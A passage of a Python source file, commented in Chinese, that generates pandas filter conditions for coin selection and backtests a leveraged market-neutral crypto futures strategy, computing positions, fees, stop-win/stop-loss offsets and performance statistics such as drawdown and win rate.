被后置的币设定资金系数 0 即是清仓\n : param inclusive: True 闭区间 ; Flase 开区间\n : param param: [direction,filter_factor,filter_type,filter_value,compare_operator,rank_ascending,filter_after,weight_ratio] 的前5到8个元素 便于链式过滤传参\n : param compare_operator 详解:\n lt, gt, lte, gte, bt, bte, nbt, nbte 是一些缩写,它们在数学和计算机科学中有特定的含义。\n lt 是 less than 的缩写,表示“小于”。\n gt 是 greater than 的缩写,表示“大于”。\n lte 是 less than or equal to 的缩写,表示“小于等于”。\n gte 是 greater than or equal to 的缩写,表示“大于等于”。\n bt 是 between 的缩写,表示“介于两者之间”。\n bte 是 between, inclusive 的缩写,表示“介于两者之间,包括两者”。\n nbt 是 not between 的缩写,表示“不介于两者之间”。\n nbte 是 not between, inclusive 的缩写,表示“不介于两者之间,但包括两者”。\n eq 是 equal 的缩写,表示“等于”\n ne 是 not equal 的缩写,表示“不等于”\n \"\"\"\n # 生成过滤行为组件\n def _str_generate(param: list = None) -> tuple:\n if len(param) < 5:\n raise ValueError('Wrong param length!')\n else:\n direction, filter_factor, filter_type, compare_operator, filter_value, rank_ascending, filter_after, \\\n weight_ratio = param + [False, False, 0][len(param) - 5:3]\n cdn_map = {'df1': 0, 'df2': 1}\n direction_map = {'多': 'df1', 'long': 'df1', 'df1': 'df1',\n '空': 'df2', 'short': 'df2', 'df2': 'df2'}\n dfx = direction_map.get(direction)\n\n if dfx is None:\n raise ValueError('Wrong direction!')\n\n assert filter_type in ['value', 'rank', 'pct']\n assert compare_operator in ['lt', 'lte', 'gt', 'gte', 'bt', 'bte', 'nbt', 'nbte', 'eq', 'ne']\n assert type(filter_factor) == str\n if rank_ascending in RankAscending.__members__.values():\n rank_ascending = rank_ascending.value\n if filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n assert rank_ascending in [True, False]\n assert filter_after in [True, False]\n if compare_operator == 'eq':\n assert type(filter_value) in [float, int]\n compare_operator = 'bte'\n filter_value = [filter_value, filter_value]\n elif compare_operator == 'ne':\n assert type(filter_value) in [float, int]\n compare_operator = 'nbt'\n filter_value = [filter_value, filter_value]\n if compare_operator.endswith('e'):\n inclusive = True\n else:\n inclusive = False\n if filter_type == 'pct': rank_ascending = True\n use_pct = None\n if compare_operator in ['lt', 'lte', 'gt', 'gte']:\n if filter_type == 'rank':\n assert type(filter_value) == int\n use_pct = False\n elif filter_type == 'pct':\n assert 0 <= filter_value <= 1\n use_pct = True\n else:\n assert type(filter_value) in [float, int]\n else:\n assert type(filter_value) == list\n assert filter_value[0] <= filter_value[1]\n if filter_type == 'rank':\n assert type(filter_value[0]) == int\n assert type(filter_value[1]) == int\n use_pct = False\n elif filter_type == 'pct':\n assert 0 <= filter_value[0] <= 1\n assert 0 <= filter_value[1] <= 1\n use_pct = True\n if type(filter_value) != list:\n if compare_operator in ['lt', 'lte']:\n filter_value = [-1e100, filter_value]\n elif compare_operator in ['gt', 'gte']:\n filter_value = [filter_value, 1e100]\n if compare_operator[:2] == 'nb':\n inclusive = not inclusive\n reverse = '~'\n else:\n reverse = ''\n if filter_type == 'value':\n rank_str = f\"filter_factor = ['{filter_factor}'][0]\"\n else:\n rank_str = f\"{dfx}[f'{filter_factor}_rank'] = {dfx}.groupby('candle_begin_time')['{filter_factor}'].rank(method='first', pct={use_pct}, ascending={rank_ascending})\"\n filter_factor = f'{filter_factor}_rank'\n left, right = filter_value\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n map_ad = 0 if not filter_after else 2\n num = cdn_num_ls[cdn_map[dfx] + map_ad]\n condition_str = f\"{pre_fix}condition{num} = {reverse}{dfx}[f'{filter_factor}'].between({left},{right},inclusive={inclusive})\"\n cdn_num_ls[cdn_map[dfx] + map_ad] += 1\n\n return rank_str, condition_str, dfx, num, weight_ratio\n # 数字映射,解决计数替换重码\n chinese_digit = '零 一二三四五六七八九'\n digit_map = {str(i): v for i, v in enumerate(chinese_digit)}\n # 组件构装\n if param is None:\n param = direction, filter_factor, filter_type, compare_operator, filter_value, rank_ascending, filter_after, weight_ratio\n if type(param) == list:\n filter_after = False if len(param) < 7 else param[6]\n if rank_ascending in RankAscending.__members__.values():\n rank_ascending = rank_ascending.value\n if filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n try:\n rank_str, condition_str, dfx, num, weight_ratio = _str_generate(param)\n except Exception as e:\n print('出错参数:', param)\n raise e\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n if not filter_after:\n filter_str = f\"{dfx} = {dfx}.loc[{pre_fix}condition{num}]\"\n else:\n filter_str = f\"{dfx}.loc[{pre_fix}condition{num},'weight_ratio'] = {weight_ratio}\"\n filter_str = f\"\"\"{rank_str}\\n{condition_str}\\n{filter_str}\"\"\"\n return filter_str\n elif type(param) == tuple:\n *params_list, logical_operators = param\n param = params_list[0]\n filter_after = False if len(param) < 7 else param[6]\n if filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n assert type(logical_operators) == str\n filter_res_list = []\n for x in params_list:\n try:\n filter_res_list.append(_str_generate(x))\n except Exception as e:\n print('出错参数:', x)\n raise e\n if len(set([x[2] for x in filter_res_list])) != 1: raise ValueError('df1 与 df2 不能进行逻辑运算')\n ref = filter_res_list[0][3] - 1\n for i in range(10):\n logical_operators = logical_operators.replace(str(i), digit_map[str(i)])\n for i, filter_res in enumerate(filter_res_list[::-1]):\n i = len(filter_res_list) - i - 1\n dfx, num, weight_ratio = filter_res[2:]\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n raw_digit = digit_map[str(i+1)]\n target_digit = str(i+1+ref)\n logical_operators = logical_operators.replace(raw_digit, f'{pre_fix}condition{target_digit}')\n if not filter_after:\n filter_str = f\"{dfx} = {dfx}.loc[{logical_operators}]\"\n else:\n if len(set([x[4] for x in filter_res_list])) != 1: raise ValueError('后置过滤与或并运算,要求weight_ratio一致')\n filter_str = f\"{dfx}.loc[{logical_operators},'weight_ratio'] = {weight_ratio}\"\n filter_strs = []\n [filter_strs.extend(x[:2]) for x in filter_res_list]\n filter_strs += [filter_str]\n filter_str = '\\n'.join(filter_strs)\n return f\"\"\"{filter_str}\"\"\"\n\ndef parallel_filter_handle(filter_before_exec):\n '''\n 将默认的串联过滤转化为并联过滤,只使用于filter_generate生成的过滤逻辑,后置过滤不适用,默认并联\n '''\n series_filter_list = []\n for content in filter_before_exec:\n series_filter_list += content.split('\\n')\n define_strs_list = [x for x in series_filter_list if 'loc' not in x]\n filter_strs_list = [x for x in series_filter_list if 'loc' in x]\n parallel_filter_list = define_strs_list + filter_strs_list\n return parallel_filter_list, 'between'\n\n\ndef np_select_by_hour(run_time, hold_hour_num, long_coin_num, short_coin_num, arr_data, quit_blacK_symbol_list):\n arr_list_long, arr_list_short, long_weight_array, short_weight_array = arr_data\n ll = []\n # log.info(quit_blacK_symbol_list)\n for temp in arr_list_long[run_time:hold_hour_num + run_time]:\n temp = temp.copy()\n if quit_blacK_symbol_list:\n raw_len = len(temp)\n for quit_symbol in quit_blacK_symbol_list:\n temp = temp[temp[:, 1] != quit_symbol]\n temp[:, 5] = temp[:, 5].argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= long_coin_num)])\n select_coin_long = np.vstack(ll)\n\n ll = []\n for temp in arr_list_short[run_time:hold_hour_num + run_time]:\n temp = temp.copy()\n if quit_blacK_symbol_list:\n for quit_symbol in quit_blacK_symbol_list:\n temp = temp[temp[:, 1] != quit_symbol]\n temp[:, 5] = (-temp[:, 5]).argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= short_coin_num)])\n select_coin_short = np.vstack(ll)\n for rank, w in enumerate(long_weight_array):\n select_coin_long[:, 3] = np.where(select_coin_long[:, 5] == rank + 1, w, select_coin_long[:, 3])\n for rank, w in enumerate(short_weight_array):\n select_coin_short[:, 3] = np.where(select_coin_short[:, 5] == rank + 1, w, select_coin_short[:, 3])\n\n select_coin_long[:, 3] = select_coin_long[:, 3] * select_coin_long[:, 6]\n select_coin_short[:, 3] = select_coin_short[:, 3] * select_coin_short[:, 6]\n return select_coin_long[:, 1:5], select_coin_short[:, 1:5]\n\n\ndef get_select_data(playCfg, run_time, all_trade_usdt, arr_data, quit_blacK_symbol_list, cache_data=[]):\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n if len(arr_data) > 0:\n # 实时从交易所拿数据计算因子即实现仿盘功能\n select_long_, select_short_ = np_select_by_hour(run_time, hold_hour_num, long_coin_num, short_coin_num, arr_data, quit_blacK_symbol_list)\n else:\n select_long, select_short = cache_data\n select_long_ = select_long[(run_time) * long_coin_num:(run_time + hold_hour_num) * long_coin_num]\n select_short_ = select_short[(run_time) * short_coin_num:(run_time + hold_hour_num) * short_coin_num]\n # 计算多头风险暴露后的 资金分配\n select_long_[:, 3] = all_trade_usdt / hold_hour_num / 2 * select_long_[:, 2] * (1 + long_risk_position)\n select_short_[:, 3] = all_trade_usdt / hold_hour_num / 2 * select_short_[:, 2] * (1 - long_risk_position)\n return select_long_, select_short_\n\n\ndef trade_symbol_info(run_time, all_trade_usdt, symbol_info, select_long_, select_short_, min_qtys, open_prices,\n close_prices, c_rate):\n next_run_time = run_time + 1\n # 计算实际下单量\n target_amount_long = select_long_[:, 3] / select_long_[:, 1]\n target_amount_short = -select_short_[:, 3] / select_short_[:, 1]\n\n for i in range(select_long_.shape[0]):\n symbol = int(select_long_[i, 0])\n symbol_info[symbol, 2] += target_amount_long[i]\n for i in range(select_short_.shape[0]):\n symbol = int(select_short_[i, 0])\n symbol_info[symbol, 2] += target_amount_short[i]\n\n symbol_info[:, 3] = symbol_info[:, 2] - symbol_info[:, 0]\n # 下单量精度修正\n for symbol in range(symbol_info.shape[0]):\n min_qty = min_qtys[symbol]\n symbol_info[symbol, 3] = np.round(symbol_info[symbol, 3] * (10 ** min_qty)) / (10 ** min_qty)\n symbol_info[:, 11] = close_prices[run_time]\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n # 处理小于5 和reduce_only 问题\n symbol_info[:, 3] = np.where((np.abs(symbol_info[:, 5]) < 5) & (symbol_info[:, 2] != 0), 0, symbol_info[:, 3])\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n\n # K线开始,交易对持仓账户影响\n symbol_info[:, 4] = open_prices[run_time]\n symbol_info[:, 3] = np.where(np.isnan(symbol_info[:, 3]), 0, symbol_info[:, 3])\n symbol_info[:, 4] = np.where(np.isnan(symbol_info[:, 4]), 0, symbol_info[:, 4])\n symbol_info[:, 6] = symbol_info[:, 4] * np.abs(symbol_info[:, 3]) * c_rate\n symbol_info[:, 7] = np.where(symbol_info[:, 0] > symbol_info[:, 3], symbol_info[:, 3], symbol_info[:, 0])\n\n symbol_info[:, 7] = np.where(np.sign(symbol_info[:, 0]) == np.sign(symbol_info[:, 3]), 0,\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 3],\n symbol_info[:, 0]))\n\n symbol_info[:, 8] = symbol_info[:, 0] + symbol_info[:, 3]\n\n symbol_info[:, 9] = np.abs(symbol_info[:, 7]) * (symbol_info[:, 4] - symbol_info[:, 1]) * np.sign(symbol_info[:, 0])\n\n symbol_info[:, 10] = np.where(symbol_info[:, 7] == 0,\n (symbol_info[:, 1] * symbol_info[:, 0] + symbol_info[:, 3] * symbol_info[:, 4]) / (\n symbol_info[:, 0] + symbol_info[:, 3]),\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 1],\n symbol_info[:, 4]))\n # 记录月化换手率 和 K线结束持仓状态\n monthly_turnover_rate = np.nansum(np.abs(symbol_info[:, 5])) / all_trade_usdt / 2 * 24 * 30.4\n\n return symbol_info, monthly_turnover_rate\n\n\ndef trade_symbol_info_stop_offset(run_time, all_trade_usdt, symbol_info, offset_symbol_info, select_long_, select_short_, min_qtys, open_prices,\n close_prices, c_rate, hold_hour_num, long_coin_num, short_coin_num, offset_black_list, offset_stop_win, offset_stop_loss):\n next_run_time = run_time + 1\n # 计算实际下单量\n target_amount_long = select_long_[:, 3] / select_long_[:, 1]\n target_amount_short = -select_short_[:, 3] / select_short_[:, 1]\n\n for offset in range(hold_hour_num):\n offset_time = run_time - hold_hour_num + 1\n if offset_time in offset_black_list:\n continue\n offset_symbol_info[:, 11] = 0\n offset_symbol_info[:, 1] = 0\n offset_symbol_info[:, 2] = 0\n for i in range(offset * long_coin_num, (offset + 1) * long_coin_num):\n symbol = int(select_long_[i, 0])\n offset_symbol_info[symbol, 2] += target_amount_long[i]\n offset_symbol_info[symbol, 1] = select_long_[i, 1]\n for i in range(offset * short_coin_num, (offset + 1) * short_coin_num):\n symbol = int(select_short_[i, 0])\n offset_symbol_info[symbol, 2] += target_amount_short[i]\n offset_symbol_info[symbol, 1] = select_short_[i, 1]\n offset_symbol_info[:, 11] = close_prices[run_time]\n offset_profit = np.nansum((offset_symbol_info[:, 11] - offset_symbol_info[:, 1]) * offset_symbol_info[:, 2])\n offset_cap = np.nansum(np.abs(offset_symbol_info[:, 1] * offset_symbol_info[:, 2]))\n offset_ret = offset_profit / offset_cap\n if offset_ret >= offset_stop_win or offset_ret <= offset_stop_loss:\n offset_black_list.append(offset_time)\n log.info(f'offset: {offset_time}触发提前中止, 当前offset收益率: {round(offset_ret,3)},止盈阈值: {offset_stop_win}, 止损阈值: {offset_stop_loss}')\n else:\n symbol_info[:, 2] += offset_symbol_info[:, 2]\n\n symbol_info[:, 3] = symbol_info[:, 2] - symbol_info[:, 0]\n # 下单量精度修正\n for symbol in range(symbol_info.shape[0]):\n min_qty = min_qtys[symbol]\n symbol_info[symbol, 3] = np.round(symbol_info[symbol, 3] * (10 ** min_qty)) / (10 ** min_qty)\n symbol_info[:, 11] = close_prices[run_time]\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n # 处理小于5 和reduce_only 问题\n symbol_info[:, 3] = np.where((np.abs(symbol_info[:, 5]) < 5) & (symbol_info[:, 2] != 0), 0, symbol_info[:, 3])\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n\n # K线开始,交易对持仓账户影响\n symbol_info[:, 4] = open_prices[run_time]\n symbol_info[:, 3] = np.where(np.isnan(symbol_info[:, 3]), 0, symbol_info[:, 3])\n symbol_info[:, 4] = np.where(np.isnan(symbol_info[:, 4]), 0, symbol_info[:, 4])\n symbol_info[:, 6] = symbol_info[:, 4] * np.abs(symbol_info[:, 3]) * c_rate\n symbol_info[:, 7] = np.where(symbol_info[:, 0] > symbol_info[:, 3], symbol_info[:, 3], symbol_info[:, 0])\n\n symbol_info[:, 7] = np.where(np.sign(symbol_info[:, 0]) == np.sign(symbol_info[:, 3]), 0,\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 3],\n symbol_info[:, 0]))\n\n symbol_info[:, 8] = symbol_info[:, 0] + symbol_info[:, 3]\n\n symbol_info[:, 9] = np.abs(symbol_info[:, 7]) * (symbol_info[:, 4] - symbol_info[:, 1]) * np.sign(symbol_info[:, 0])\n\n symbol_info[:, 10] = np.where(symbol_info[:, 7] == 0,\n (symbol_info[:, 1] * symbol_info[:, 0] + symbol_info[:, 3] * symbol_info[:, 4]) / (\n symbol_info[:, 0] + symbol_info[:, 3]),\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 1],\n symbol_info[:, 4]))\n # 记录月化换手率 和 K线结束持仓状态\n monthly_turnover_rate = np.nansum(np.abs(symbol_info[:, 5])) / all_trade_usdt / 2 * 24 * 30.4\n\n return symbol_info, monthly_turnover_rate, offset_black_list\n\n\ndef update_symbol_info(run_time, symbol_info, close_prices):\n next_run_time = run_time + 1\n # K线结束,close对持仓账户影响\n symbol_info[:, 11] = close_prices[next_run_time]\n symbol_info[:, 12] = symbol_info[:, 8] * (symbol_info[:, 11] - symbol_info[:, 10])\n # 计算已实现盈亏 未实现盈亏 交易手续费\n totalRealizedProfit = np.nansum(symbol_info[:, 9])\n totalUnrealizedProfit = np.nansum(symbol_info[:, 12])\n commission = -np.nansum(symbol_info[:, 6])\n symbol_info_ = symbol_info.copy()\n\n symbol_info[:, 8] = np.where(np.abs(symbol_info[:, 8]) * symbol_info[:, 11] < 1, 0, symbol_info[:, 8])\n # K线结束 重置持仓账户\n symbol_info[:, 0] = symbol_info[:, 8]\n symbol_info[:, 1] = symbol_info[:, 10]\n symbol_info[:, 2:] = 0\n symbol_info[:, 1] = np.where(np.isnan(symbol_info[:, 1]), 0, symbol_info[:, 1])\n return totalRealizedProfit, totalUnrealizedProfit, commission, symbol_info_, symbol_info\n\n\ndef timming_fun(signal_fun, curve, trade_ratio_limit=0.1):\n if signal_fun is None: return 1\n trade_ratio = signal_fun(curve)\n if abs(trade_ratio) < trade_ratio_limit:\n trade_ratio = np.sign(trade_ratio) * trade_ratio_limit\n return trade_ratio\n\n\ndef neutral_playback(playCfg, N, p_signal_fun, select_long, select_short, account, symbol_info, open_prices, close_prices, quit_arry, min_qtys, arr_data):\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n month_turnover_rate_list = []\n symbol_info_list = []\n offset_symbol_info = symbol_info.copy()\n offset_black_list = []\n\n ls_list = [[0., 0.]]\n hold_symbol_list = []\n quit_blacK_symbol_list = []\n account[0, 0] = initial_trade_usdt\n account[0, 1] = initial_trade_usdt\n account[0, 5] = np.inf\n curve = account[:, 0].copy()\n curve[0] = 1\n cache_data = [select_long, select_short]\n for run_time in range(N):\n next_run_time = run_time + 1\n curve_ = curve[:next_run_time]\n trade_ratio = timming_fun(p_signal_fun, curve_)\n all_trade_usdt = account[run_time, 0] * leverage * trade_ratio\n # 获取该时刻选币数据和多头风险暴露后的资金分配\n select_long_, select_short_ = get_select_data(playCfg, run_time, all_trade_usdt, arr_data, quit_blacK_symbol_list, cache_data=cache_data)\n long_coin_num_, short_coin_num_ = long_coin_num, short_coin_num\n if trade_ratio < 0:\n select_long_, select_short_ = select_short_, select_long_\n long_coin_num_, short_coin_num_ = short_coin_num_, long_coin_num_\n # 退市币最后一根有效K强制清仓\n if len(arr_data) > 0:\n if len(quit_arry) > 0:\n clear_arr = quit_arry[quit_arry[:, 0] == run_time]\n if len(clear_arr) > 0:\n for quit_symbol in clear_arr[:, 1]:\n select_long_[:, 3] = np.where([select_long_[:, 0] == quit_symbol], 0, select_long_[:, 3])\n select_short_[:, 3] = np.where([select_short_[:, 0] == quit_symbol], 0, select_short_[:, 3])\n quit_blacK_symbol_list.append(quit_symbol)\n log.info(f'{quit_symbol} 即将下架,马上获取不到K线数据,执行清仓并拉入黑名单')\n if offset_stop_win == 0 and offset_stop_loss == 0:\n # 开盘交易 symbol_info\n symbol_info, monthly_turnover_rate = trade_symbol_info(run_time, all_trade_usdt, symbol_info, select_long_, select_short_, min_qtys, open_prices, close_prices, c_rate)\n else:\n # 带offset止盈止损 symbol_info\n symbol_info, monthly_turnover_rate, offset_black_list = trade_symbol_info_stop_offset(run_time, all_trade_usdt, symbol_info, offset_symbol_info, select_long_, select_short_, min_qtys, open_prices, close_prices, c_rate, hold_hour_num, long_coin_num_, short_coin_num_, offset_black_list, offset_stop_win, offset_stop_loss)\n\n month_turnover_rate_list.append(monthly_turnover_rate)\n\n # 任意时点更新 symbol_info\n totalRealizedProfit, totalUnrealizedProfit, commission, symbol_info_, symbol_info = update_symbol_info(run_time, symbol_info, close_prices)\n\n long_value = np.nansum(np.where(symbol_info_[:, 8] > 0, symbol_info_[:, 8] * symbol_info_[:, 11], 0))\n short_value = np.nansum(np.where(symbol_info_[:, 8] < 0, -symbol_info_[:, 8] * symbol_info_[:, 11], 0))\n\n ls_list.append([long_value, short_value])\n\n # 精度撞见退市修复\n symbol_info_[:, 11] = np.where((np.abs(symbol_info_[:, 8]) > 0) & np.isnan(symbol_info_[:, 11]), 0,\n symbol_info_[:, 11])\n symbol_info_[:, 8] = np.where(np.abs(symbol_info_[:, 8]) * symbol_info_[:, 11] < 0.001 * all_trade_usdt, 0, symbol_info_[:, 8])\n symbol_info_list.append(symbol_info_)\n\n hold_symbol_list.append([np.argwhere((symbol_info_[:, 8] > 0))[:, 0], np.argwhere((symbol_info_[:, 8] < 0))[:, 0]])\n # 更新币安账户\n account[next_run_time, 2] = totalRealizedProfit\n account[next_run_time, 3] = totalUnrealizedProfit\n account[next_run_time, 4] = commission\n account[next_run_time, 0] = account[run_time, 0] + account[next_run_time, 2] + account[next_run_time, 4]\n account[next_run_time, 1] = account[next_run_time, 0] + account[next_run_time, 3]\n account[next_run_time, 5] = account[next_run_time, 1] / (np.abs(np.nansum((symbol_info_[:, 8] * symbol_info_[:, 11]))) + 1e-8)\n curve[next_run_time] = curve[run_time] * (1 + (account[next_run_time, 1] / account[run_time, 1] - 1) / leverage / trade_ratio)\n return account, month_turnover_rate_list, symbol_info_list, ls_list, hold_symbol_list\n\n\ndef cal_hourly_details(replace_symbol_to_int, time_index, i, data):\n symbol_info = pd.DataFrame(data, columns=['当前持仓量', '开仓价格', '目标下单量', '实际下单量', 'avg_price', '实际下单资金', '手续费', '已实现仓位',\n '交易后持仓量', '已实现盈亏', '新开仓价格', 'close', '未实现盈亏'],\n index=replace_symbol_to_int.keys())\n # 各小时持仓详情记录\n display_df = symbol_info[['交易后持仓量', 'close', '未实现盈亏', '开仓价格']]\n display_df = display_df[display_df['交易后持仓量'] != 0]\n\n display_df['direction'] = np.sign(display_df['交易后持仓量'])\n\n display_df['notional'] = (display_df['交易后持仓量'] * display_df['close']).abs()\n display_df['持仓均价'] = display_df['开仓价格'] # / np.abs(display_df['交易后持仓量'])\n\n # 持仓市值占比\n display_df['national_p'] = display_df['notional'] / display_df['notional'].sum()\n # 总市值盈亏贡献占比\n display_df['未实现盈亏_p'] = display_df['未实现盈亏'] / display_df['notional'].sum()\n # 盈亏贡献占比\n display_df.loc[display_df['未实现盈亏_p'] < 0, 'loss_profit_p'] = display_df.loc[display_df['未实现盈亏_p'] < 0, '未实现盈亏'] / \\\n display_df.loc[\n display_df['未实现盈亏_p'] < 0, '未实现盈亏'].sum()\n display_df.loc[display_df['未实现盈亏_p'] >= 0, 'win_profit_p'] = display_df.loc[display_df['未实现盈亏_p'] >= 0, '未实现盈亏'] / \\\n display_df.loc[\n display_df['未实现盈亏_p'] >= 0, '未实现盈亏'].sum()\n display_df['未实现盈亏_p'] = display_df['未实现盈亏_p'] / display_df['national_p']\n display_df['win_loss_distribute'] = display_df[['loss_profit_p', 'win_profit_p']].max(axis=1)\n # 持仓市值排序\n display_df['national_rank'] = display_df['national_p'].rank(ascending=False)\n display_df.index.name = 'symbol'\n\n display_df.sort_values('national_rank', inplace=True)\n\n display_df = display_df[\n ['交易后持仓量', 'direction', '持仓均价', 'close', 'notional', 'national_p', '未实现盈亏', '未实现盈亏_p', 'win_loss_distribute', 'national_rank']]\n\n display_df.columns = ['持仓数量', '持仓方向', '持仓均价', '币种现价', '持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%', '持仓市值排名']\n\n display_df[['持仓市值占比%', '未实现盈亏占市值比%', '盈利亏损贡献度%']] = display_df[['持仓市值占比%', '未实现盈亏占市值比%', '盈利亏损贡献度%']] * 100\n\n display_df[['持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%']] = display_df[\n ['持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%']].round(2)\n\n display_df['candle_begin_time'] = time_index[i + 1]\n display_df = display_df.reset_index()\n\n order_df = symbol_info[['当前持仓量', '实际下单量', 'avg_price']].reset_index()\n order_df.columns = ['symbol', '当前持仓量', '实际下单量', '理想开仓均价']\n order_df = order_df[order_df['实际下单量'] != 0]\n order_df['candle_begin_time'] = time_index[i] + datetime.timedelta(minutes=1)\n return display_df, order_df\n\n\ndef freestep_evaluate(ls_df, long_hold, short_hold, month_turnover_rate_list=[0], compound_name='策略评价'):\n # 计算统计指标\n month_turnover_rate = np.nanmean(month_turnover_rate_list)\n key = compound_name\n results = pd.DataFrame()\n curve = ls_df['资金曲线'].to_frame(compound_name)\n curve.index.name = 'candle_begin_time'\n curve_ = curve.copy()\n curve.reset_index(inplace=True)\n curve['本周期多空涨跌幅'] = curve[key].pct_change().fillna(0)\n # 累积净值\n results.loc[key, '累积净值'] = round(curve[key].iloc[-1], 3)\n # ���算当日之前的资金曲线的最高点\n curve['max2here'] = curve[key].expanding().max()\n # 计算到历史最高值到当日的跌幅,drowdwon\n curve['dd2here'] = curve[key] / curve['max2here'] - 1\n # 计算最大回撤,以及最大回撤结束时间\n end_date, max_draw_down = tuple(curve.sort_values(by=['dd2here']).iloc[0][['candle_begin_time', 'dd2here']])\n # 计算最大回撤开始时间\n start_date = curve[curve['candle_begin_time'] <= end_date].sort_values(by=key, ascending=False).iloc[0][\n 'candle_begin_time']\n # 将无关的变量删除\n curve.drop(['max2here', 'dd2here'], axis=1, inplace=True)\n results.loc[key, '最大回撤'] = format(max_draw_down, '.2%')\n results.loc[key, '最大回撤开始时间'] = str(start_date)\n results.loc[key, '最大回撤结束时间'] = str(end_date)\n # ===统计每个周期\n results.loc[key, '盈利周期数'] = len(curve.loc[curve['本周期多空涨跌幅'] > 0]) # 盈利笔数\n results.loc[key, '亏损周期数'] = len(curve.loc[curve['本周期多空涨跌幅'] <= 0]) # 亏损笔数\n results.loc[key, '胜率'] = format(results.loc[key, '盈利周期数'] / (len(curve) + eps), '.2%') # 胜率\n results.loc[key, '每周期平均收益'] = format(curve['本周期多空涨跌幅'].mean(), '.3%') # 每笔交易平均盈亏\n if curve.loc[curve['本周期多空涨跌幅'] <= 0]['本周期多空涨跌幅'].mean() != 0:\n results.loc[key, '盈亏收益比'] = round(curve.loc[curve['本周期多空涨跌幅'] > 0]['本周期多空涨跌幅'].mean() / \\\n curve.loc[curve['本周期多空涨跌幅'] <= 0]['本周期多空涨跌幅'].mean() * (-1), 2) # 盈亏比\n else:\n results.loc[key, '盈亏收益比'] = np.nan\n results.loc[key, '单周期最大盈利'] = format(curve['本周期多空涨跌幅'].max(), '.2%') # 单笔最大盈利\n results.loc[key, '单周期大亏损'] = format(curve['本周期多空涨跌幅'].min(), '.2%') # 单笔最大亏损\n # ===连续盈利亏损\n results.loc[key, '最大连续盈利周期数'] = max(\n [len(list(v)) for k, v in itertools.groupby(np.where(curve['本周期多空涨跌幅'] > 0, 1, np.nan))]) # 最大连续盈利次数\n results.loc[key, '最大连续亏损周期数'] = max(\n [len(list(v)) for k, v in itertools.groupby(np.where(curve['本周期多空涨跌幅'] <= 0, 1, np.nan))]) # 最大连续亏损次数\n results.loc[key, '月换手率'] = month_turnover_rate\n # ===每年、每月收益率\n curve.set_index('candle_begin_time', inplace=True)\n # year_return = curve[['本周期多空涨跌幅']].resample(rule='A').apply(lambda x: (1 + x).prod() - 1)\n # month_return = curve[['本周期多空涨跌幅']].resample(rule='M').apply(lambda x: (1 + x).prod() - 1)\n # year_return.columns=[key]\n # month_return.columns=[key]\n\n # 计算相对年化 最大回撤 信息系数 波动率\n result_stats = pd.DataFrame(index=['年化收益', '月化收益', '月信息比', '月化波动'],\n columns=curve_.columns)\n result_stats.loc['年化收益'][:] = np.power(curve_.iloc[-1], 365 * 24 / (curve_.shape[0] - 1)) - 1\n result_stats.loc['月化收益'][:] = np.power(curve_.iloc[-1], 30.4 * 24 / (curve_.shape[0] - 1)) - 1\n result_stats.loc['月化波动'][:] = curve_.pct_change().dropna().apply(lambda x: x.std() * np.sqrt(30.5 * 24))\n result_stats.loc['月信息比'][:] = (result_stats.loc['月化收益'][:] / (result_stats.loc['月化波动'][:] + eps))\n result_stats = result_stats.astype('float32').round(3)\n\n data = multi_list_merge([result_stats.T, results])\n data['月化收益回撤比'] = data['月化收益'] / (abs(data['最大回撤'].str[:-1].astype('float32')) + eps) * 100\n\n data = data[['累积净值', '年化收益', '月化收益', '月信息比', '月化波动', '月换手率', '月化收益回撤比', '最大回撤', '最大回撤开始时间', '最大回撤结束时间', '盈利周期数',\n '亏损周期数', '胜率', '每周期平均收益', '盈亏收益比', '单周期最大盈利', '单周期大亏损', '最大连续盈利周期数',\n '最大连续亏损周期数']]\n\n curve = ls_df[['资金曲线', '多头占比', '空头占比']]\n\n curve['long_hold_symbol'] = ' '\n curve['short_hold_symbol'] = ' '\n\n curve['long_hold_symbol'].iloc[1:] = long_hold.values\n curve['short_hold_symbol'].iloc[1:] = short_hold.values\n return data, curve\n\n\ndef neutral_strategy_playback(\n playCfg,\n p_signal_fun,\n start_date,\n end_date,\n symbols_data,\n arr_data,\n quit_arry,\n all_symbol_list,\n replace_symbol_to_int,\n replace_symbol_to_int_,\n select_long,\n select_short,\n compound_name='中性回放',\n min_marginRatio=0.01,\n hourly_details=False):\n # 载入配置\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n # 读取币种精度数据\n min_qty_df = pd.read_csv(min_qty_path, encoding='gbk')\n min_qty_df['合约'] = min_qty_df['合约'].str.replace('-', '')\n min_qty_df = pd.DataFrame(\n all_symbol_list,\n columns=['合约']).merge(\n min_qty_df,\n on=['合约'],\n how='left')\n min_qty_df['最小下单量'].fillna(min_qty_df['最小下单量'].min(), inplace=True)\n min_qty_df['最小下单量'] = min_qty_df['最小下单量'].apply(\n lambda x: 